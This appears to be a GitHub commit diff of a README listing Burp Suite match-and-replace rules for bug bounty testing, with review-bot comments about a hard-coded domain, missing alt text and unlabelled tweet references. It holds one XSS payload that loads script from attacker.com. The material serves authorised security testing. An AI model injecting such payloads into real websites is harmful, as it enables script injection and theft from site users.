Update README.md

pull/2/head
Muhammad Daffa 2022-05-05 01:19:25 +07:00 committed by GitHub
parent 7915fff690
commit 31b5b4190d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 0 deletions


@ -82,6 +82,7 @@ By adding some XSS payload into the request
<img src="https://user-images.githubusercontent.com/36522826/166752610-9d21d86e-49e5-4e8f-86bc-a9134350d46d.png" width="400" />
> So by just inputting the words `xss_payload` on the website it will be immediately replaced with `"><script src=https://attacker.com></script>`
> Change the XSS payload as you want
## MISC
Some random match and replace rules
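Review bot: The note under the XSS screenshot hard-codes `https://attacker.com` as the script source, which is a real registrable domain outside the author's control, so a reader who copies the rule verbatim would pull script from whoever owns that name. Use a reserved documentation domain such as `attacker.example` instead. The `<img>` tag in this hunk also has no `alt` text, so the rule shown in the screenshot is invisible to search and to screen readers.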
@ -90,3 +91,17 @@ Some random match and replace rules
<img src="https://user-images.githubusercontent.com/36522826/166748175-6782ce51-b10f-4b1d-b8a3-610ef142d567.png" width="400" />
> Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere
* Help companies to identify your traffic and separate them from malicious traffic by adding a custom header
<img src="https://user-images.githubusercontent.com/36522826/166796789-e184716f-00a3-428d-9323-bcd985556798.png" width="400" />
References:
- https://twitter.com/PTestical/status/1413497660133318659
- https://twitter.com/HolyBugx/status/1355472991061213184
- https://twitter.com/intigriti/status/1192103070072741894
- https://twitter.com/payloadartist/status/1469582893772984322
- https://twitter.com/payloadartist/status/1422247377516122114
- https://twitter.com/hackerscrolls/status/1247177578269597698
> Soon will be updated again
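Review bot: The custom-header bullet explains the purpose of the rule, but the header name and value exist only inside the screenshot, and the `<img>` tag has no `alt` text, so the one rule a program's security team would want to filter on cannot be read or copied from the text. State the header name and an example value in the bullet itself. The References list is six bare tweet URLs with no indication of which rule each one supports; add a short label per link, since tweets can be deleted and the list then carries no information. The closing `> Soon will be updated again` is a status remark that belongs in the commit message or an issue rather than in the README body.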